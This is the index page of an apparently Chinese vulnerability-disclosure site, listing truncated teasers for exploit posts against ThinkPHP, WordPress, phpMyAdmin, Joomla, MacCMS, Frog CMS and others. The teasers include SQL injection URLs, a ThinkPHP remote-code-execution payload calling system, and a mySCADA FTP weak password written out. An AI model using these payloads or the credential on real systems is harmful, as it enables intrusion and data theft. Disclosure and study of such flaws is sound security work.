当前分类

漏洞公布

云豹直播系统两处注入漏洞

注入一: 文件位置: /application/Home/Controller/PlaybackController.class.php 注入链接: http://www.hedysx.com/index.php?g=Home&m=Playback&touid=1 注入二: 文件位置: /application/Appapi/Controller/Vi...

Weblogic反序列化远程命令执行漏洞(CNVD-C-2019-48814)

这是来自民生银行的原创0DAY漏洞,目前还没有补丁,但是POC有理由相信已经在外流传,目前明确影响了几个规模型企业,好在整体形象范围不算大。请大家及时进行临时解决方案的修复。 WebLogic wls9-async反序列化远程命令执行漏洞 ...

WordPress 5.0 远程代码执行

WordPress Core 5.0 - Remote Code Execution Exploit var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ''; var post_id = 0; var cmd = '<!--?php phpinfo();/*'; var ...

MacCms(苹果cms)注入漏洞

文章是转载一位表哥,全程分析这里 maccms8_mfb(苹果CMS视频分享程序 8.0 | 2017.09.27 发布的版本 Poc #! /usr/bin/python # -*- coding:utf-8 -*- #author:F0rmat import requests import time dict = "1234567890qwertyuiopa...

Joomla JoomCRM 1.1.1注入漏洞

# POC: # http://localhost/[PATH]/index.php?option=com_joomcrm&amp;amp;view=contacts&amp;amp;format=raw&amp;amp;loc=deal&amp;amp;tmpl=component&amp;amp;deal_id=[SQL] # GET /[PATH]/index.php?optio...

Frog CMS 0.9.5跨站漏洞

# Version:0.9.5 # CVE :CVE-2018-20448 # The parameter under /install/index.php is that the Database name has reflective XSS # 1 The Database name , username and password must be correct # 2 You can use the exp: <sc...

thinkphp v5.x 远程代码执行漏洞poc

20181216补充: 1.执行phpinfo http://unhonker.com/public/index.php?s=/index/\think\app/invokefunction&amp;amp;amp;amp;amp;amp;function=call_user_func_array&amp;amp;amp;amp;amp;amp;vars[0]=system&amp;amp;amp...

phpMyAdmin 4.8.1本地文件包含漏洞

CVE-2018-12613 # 1. Description: # An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion...

IE11 Null Pointer Difference

# Date: 2018-11-03 # Vendor: Microsoft Corporation # Product web page: https://www.microsoft.com # Affected version: 11.345.17134.0 (Update Versions: 11.0.90 (KB4462949)) # 11.1387.15063.0 (Upd...

[工控安全]mySCADA爆FTP弱口令 mySCADA myPRO 7

2018年5月20号,mySCADA再一次爆出FTP弱口令漏洞。 本次涉及到的版本为:myPRO 7 本次爆出的弱口令为:username:password = myscada:Vikuk63  

123...24

插入图片
返回顶部